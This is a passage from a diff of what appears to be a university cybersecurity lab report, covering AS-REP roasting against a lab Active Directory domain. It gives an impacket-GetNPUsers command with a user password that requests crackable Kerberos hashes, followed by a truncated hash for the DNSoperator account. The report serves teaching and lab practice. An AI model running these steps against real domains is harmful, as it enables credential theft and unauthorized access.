AM311/Cybersecurity_Report/home.md

 	==MOSTRARE GRUPPI --> ACCOUNT NON È ADMIN==

  3. **Ask for a TGT:**
-We now ask the DC to generate a **TGT** for each of the previous accounts and we format them so that they are ready to be cracked using *John the Ripper*:
+We now ask the DC to generate a **TGT** for each of the previous accounts and we format them so they are ready to be cracked using *John the Ripper*:

     `impacket-GetNPUsers -dc-ip 10.0.2.200 cybersec.units.it/DomainUser:User00! -request -format john`

-	From the output, we copy the string referring to the desired account (*as shown below*) in a **text file** called `usernames.txt` and located on the desktop.
+	From the output, we copy the string referring to `DNSoperator` in a **text file** called `usernames.txt` and located on the desktop.

 	   `$krb5asrep$DNSoperator@CYBERSEC.UNITS.IT:8690a5aa5b288a036a49126539f292ef$afe3e87aafc
 	    35690745c5dfeb1f459dcc1ed858f1f4755d3aefa12921c93dbc35b35c0fd6094be7390eab67e0c016f96